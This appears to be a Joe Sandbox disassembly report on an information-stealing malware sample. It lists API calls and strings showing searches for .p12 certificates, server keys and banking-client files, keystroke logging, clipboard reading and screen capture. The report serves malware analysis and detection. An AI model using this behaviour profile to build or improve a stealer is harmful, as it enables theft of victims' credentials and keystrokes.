• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: Error$File$DirectoryDriveFindLastModePathmemset$AdminAttributesBackslashCreateCurrentFirstFolderLogicalMakeNextStringsSystemTypeUser
• String ID: *.00*$.txt$.zip$7F1BFCBF$asus$found.$keys$path
• API String ID: 3801700313-420153276
APIs
• IsWindow.USER32(?), ref: 02C7BE9A
• IsIconic.USER32(?), ref: 02C7BEA5
• GetWindowInfo.USER32(?,?), ref: 02C7BF02
• GetAncestor.USER32(?,00000003,?,762330D0), ref: 02C7BF27
• GetWindow.USER32(?,00000003), ref: 02C7BFA0
• IsWindow.USER32(?), ref: 02C7BFC8
• IsIconic.USER32(?), ref: 02C7BFD3
• memset.MSVCRT ref: 02C7C002
• GetWindow.USER32(?,00000005), ref: 02C7C026
• GetWindow.USER32(00000000), ref: 02C7C029
  • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
Strings
Memory Dump Source
• Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: Window$Iconic$AncestorClassInfoNamememset
• String ID: <$<
• API String ID: 3351429209-213342407
APIs
• GetDriveTypeA.KERNEL32(?), ref: 02C8BBF5
• SetCurrentDirectoryA.KERNEL32(?), ref: 02C8BC04
• FindFirstFileA.KERNEL32(?,?), ref: 02C8BC51
• GetFileAttributesA.KERNEL32(?), ref: 02C8BC6A
• StrStrIA.SHLWAPI(?,found.), ref: 02C8BC81
• StrStrIA.SHLWAPI(?,asus), ref: 02C8BC98
• FindNextFileA.KERNEL32(00000000,?), ref: 02C8BCAF
• PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8BCE4
• CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8BD1E
• GetLastError.KERNEL32 ref: 02C8BD28
• IsUserAnAdmin.SHELL32 ref: 02C8BD30
• PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8BD3F
• SetLastError.KERNEL32(00000000), ref: 02C8BD46
• SetErrorMode.KERNEL32(?), ref: 02C8BF52
Strings
Memory Dump Source
• Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: ErrorFile$DirectoryFindLastPath$AdminAttributesBackslashCreateCurrentDriveFirstFolderMakeModeNextSystemTypeUser
• String ID: *.00*$.txt$.zip$7F1BFC0D$asus$found.$keys$path
• API String ID: 3516781098-2328322984
APIs
• GetDriveTypeA.KERNEL32(?), ref: 02C8D195
• SetCurrentDirectoryA.KERNEL32(?), ref: 02C8D1A4
• FindFirstFileA.KERNEL32(?,?), ref: 02C8D1F1
• GetFileAttributesA.KERNEL32(?), ref: 02C8D20A
• StrStrIA.SHLWAPI(?,found.), ref: 02C8D221
• StrStrIA.SHLWAPI(?,asus), ref: 02C8D238
• FindNextFileA.KERNEL32(00000000,?), ref: 02C8D24F
• PathAddBackslashA.SHLWAPI(7F1BFCBF), ref: 02C8D284
• CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
• GetLastError.KERNEL32 ref: 02C8D2C8
• IsUserAnAdmin.SHELL32 ref: 02C8D2D0
• PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
• SetLastError.KERNEL32(00000000), ref: 02C8D2E6
• SetErrorMode.KERNEL32(?), ref: 02C8D4F2
Strings
Memory Dump Source
• Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: ErrorFile$DirectoryFindLastPath$AdminAttributesBackslashCreateCurrentDriveFirstFolderMakeModeNextSystemTypeUser
• String ID: *.00*$.txt$.zip$7F1BFCBF$asus$found.$keys$path
• API String ID: 3516781098-420153276
APIs
• memset.MSVCRT ref: 02C7119E
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7622F570), ref: 02C711BD
• StrStrIA.SHLWAPI(00000000,java), ref: 02C711D5
• StrStrIA.SHLWAPI(00000000,.exe), ref: 02C711EB
• StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02C7120F
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71231
• GetProcessHeap.KERNEL32(00000008,?), ref: 02C7124E
• HeapAlloc.KERNEL32(00000000), ref: 02C71255
• memset.MSVCRT ref: 02C71265
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71281
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C89ED0,00000000,00000000,00000000), ref: 02C71295
                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02C712B4
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C712E5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C71302
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C71309
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C71319
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71335
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8D540,00000000,00000000,00000000), ref: 02C71349
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8EB60,00000000,00000000,00000000), ref: 02C71386
                                                                                                                                                                                                                      • Part of subcall function 02C89E20: PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C89E47
                                                                                                                                                                                                                      • Part of subcall function 02C89E20: PathFileExistsA.SHLWAPI(?), ref: 02C89EB0
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7139E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C713AF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                                    • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                                    • API String ID: 183229269-3502489836
                                                                                                                                                                                                                    • Opcode ID: f680c842c16c72ab64df9a65bb09bd1b379547037e350193ea1be9a47f736af0
                                                                                                                                                                                                                    • Instruction ID: 11bba8a6c2a8effb5c3e6ee5715992e5dc9e33b41e28deec2c99e8fae3ac34ab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f680c842c16c72ab64df9a65bb09bd1b379547037e350193ea1be9a47f736af0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9151E671E8522576EB319A618C49FEB7E6CDF81B55F184354BD0DAA1C0EBB0DA00CAF4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C93170: memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                                      • Part of subcall function 02C93170: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,ctunnel.exe,?,75AF7390,?), ref: 02C8B83C
                                                                                                                                                                                                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C8B85B
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8B86D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8B87E
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B8A7
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B8E1
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8B8EB
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8B8F3
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B904
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8B90B
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8B941
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8B980
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D,?,?), ref: 02C8B9C7
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D,ctunnel.exe,?,75AF7390,?), ref: 02C8BAA7
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C8BB09
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashFile$CreateDirectoryErrorHandleLast$AdminAttributesCloseCurrentExistsFolderInformationMakeModuleNameOpenProcessSnapshotSystemToolhelp32Usermemset
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$\$ctunnel.exe$ctunnel.zip$pass.log$path_ctunnel.txt
                                                                                                                                                                                                                    • API String ID: 3886636124-1565033849
                                                                                                                                                                                                                    • Opcode ID: 5632cfc693b9e8f48569ad7b779458145c89946c573e244bd4fa9270bb4473db
                                                                                                                                                                                                                    • Instruction ID: 9745a22860d5e6ba97636dfaab07f19f23a1992d8541023edbfad4e199ed9e66
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5632cfc693b9e8f48569ad7b779458145c89946c573e244bd4fa9270bb4473db
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB9139309446598FDB16DB24A858BE6BBF8EF86308F14C7D4E889D7241DB30DE49CB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C90C10
                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI(?), ref: 02C90C1D
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(ISClient.cfg), ref: 02C90C32
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                                      • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                                      • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,GKUZ=,?,00000000,00000001), ref: 02C90C7D
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C90C9D
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C90CAF
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90CDE
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C90CEF
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C90CF6
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90D08
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90D19
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02C90D67
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 02C90D7E
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 02C90D87
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHeap$Handle$Process$CharCloseCreateInformationMutexNamePathUpperstrstr$AllocateExistsFindFreeModulePrivateProfileReadReleaseSizeSleepStringValidateWritememset
                                                                                                                                                                                                                    • String ID: DefaultPrivateDir$GKUZ=$General$ISClient.cfg$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0#v$interpro.ini
                                                                                                                                                                                                                    • API String ID: 1392943061-2569638643
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 02C7C078
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7C0BB
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 02C7C0CB
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C0E5
                                                                                                                                                                                                                    • GetScrollBarInfo.USER32(00000000,000000FA,?,?,?,762330D0), ref: 02C7C100
                                                                                                                                                                                                                    • GetScrollBarInfo.USER32(00000000,000000FB,0000003C,?,?,762330D0), ref: 02C7C12D
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C7C165
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7C168
                                                                                                                                                                                                                    • IsIconic.USER32(00000000), ref: 02C7C087
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: IsWindow.USER32(00000000), ref: 02C7B9ED
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: IsWindowVisible.USER32(00000000), ref: 02C7B9FC
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: GetWindowRect.USER32(00000000,?), ref: 02C7BA39
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: GetClassLongA.USER32(00000000,000000E6), ref: 02C7BA42
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: PrintWindow.USER32(00000000,?,00000000,?,762330D0,?,?,?,02C7843E), ref: 02C7BA55
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,762330D0,?,?,?,02C7843E), ref: 02C7BA7B
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: CreateRectRgn.GDI32(?,?,02C7843E,?), ref: 02C7BA91
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: GetWindowRgn.USER32(00000000,00000000), ref: 02C7BA9B
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: OffsetRgn.GDI32(00000000,?,?), ref: 02C7BAB5
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: SelectClipRgn.GDI32(?,00000000), ref: 02C7BAC0
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: BitBlt.GDI32(?,?,?,02C7843E,?,?,00000000,00000000,00CC0020), ref: 02C7BAE9
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7C18E
                                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 02C7C19D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7C1CE
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 02C7C1DB
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 02C7C1F2
                                                                                                                                                                                                                    • GetScrollBarInfo.USER32(?,000000FA,0000003C,?,?,762330D0), ref: 02C7C21D
                                                                                                                                                                                                                    • GetScrollBarInfo.USER32(?,000000FB,0000003C,?,?,762330D0), ref: 02C7C255
                                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 02C7C292
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7C295
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$InfoRectScroll$Long$Iconicmemset$ClassClipCreateOffsetPrintRedrawSelectVisible
                                                                                                                                                                                                                    • String ID: <$<
                                                                                                                                                                                                                    • API String ID: 3463799249-213342407
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81E7D
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 02C81E9E
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C81EBF
                                                                                                                                                                                                                    • GetGUIThreadInfo.USER32(00000000), ref: 02C81EC6
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32 ref: 02C81EDC
                                                                                                                                                                                                                    • GetActiveWindow.USER32 ref: 02C81EEA
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02C81F18
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02C81F3A
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C81F41
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81F51
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02C81F6E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81FBB
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C81FBE
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81FCB
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C81FCE
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 02C81FD9
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 02C8201F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                    • API String ID: 3472172748-4108050209
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81BB2
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02C81ACE
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: GetWindowTextA.USER32(00000000,?,00000104), ref: 02C81AE9
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B47
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: HeapValidate.KERNEL32(00000000), ref: 02C81B4A
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B57
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: HeapFree.KERNEL32(00000000), ref: 02C81B5A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,00000000), ref: 02C81C15
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C81C1C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81C2F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 02C81C3F
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02C81C46
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,02C83142,?,?,?,00000000), ref: 02C81C66
                                                                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C81C6D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$AllocValidatememset$AncestorFreeTextWindow
                                                                                                                                                                                                                    • String ID: [bks]$[del]$[ins]$[ret]$[tab]
                                                                                                                                                                                                                    • API String ID: 4095246728-233650549
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,7622F550,7622DF10,7693BD50), ref: 02C7168A
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C7169B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 02C716AF
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C716D1
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 02C716E1
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 02C716FC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTextA), ref: 02C71708
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressModuleProcVirtual$HandleProtect$AllocFileNamememcpy
                                                                                                                                                                                                                    • String ID: CreateFileW$GetFileAttributesW$GetWindowTextA$\explorer.exe$kernel32.dll$user32.dll
                                                                                                                                                                                                                    • API String ID: 1733008709-77332811
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C92337
                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI(?), ref: 02C92344
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02C92394
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 02C923AC
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 02C923B5
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,?), ref: 02C923C5
                                                                                                                                                                                                                      • Part of subcall function 02C92180: PathAddBackslashA.SHLWAPI(7F1BF93B), ref: 02C921B0
                                                                                                                                                                                                                      • Part of subcall function 02C92180: CreateDirectoryA.KERNEL32(?,00000000), ref: 02C921F1
                                                                                                                                                                                                                      • Part of subcall function 02C92180: GetLastError.KERNEL32 ref: 02C921FB
                                                                                                                                                                                                                      • Part of subcall function 02C92180: IsUserAnAdmin.SHELL32 ref: 02C92203
                                                                                                                                                                                                                      • Part of subcall function 02C92180: PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92214
                                                                                                                                                                                                                      • Part of subcall function 02C92180: SetLastError.KERNEL32(00000000), ref: 02C9221B
                                                                                                                                                                                                                      • Part of subcall function 02C92180: SetCurrentDirectoryA.KERNEL32(?), ref: 02C92228
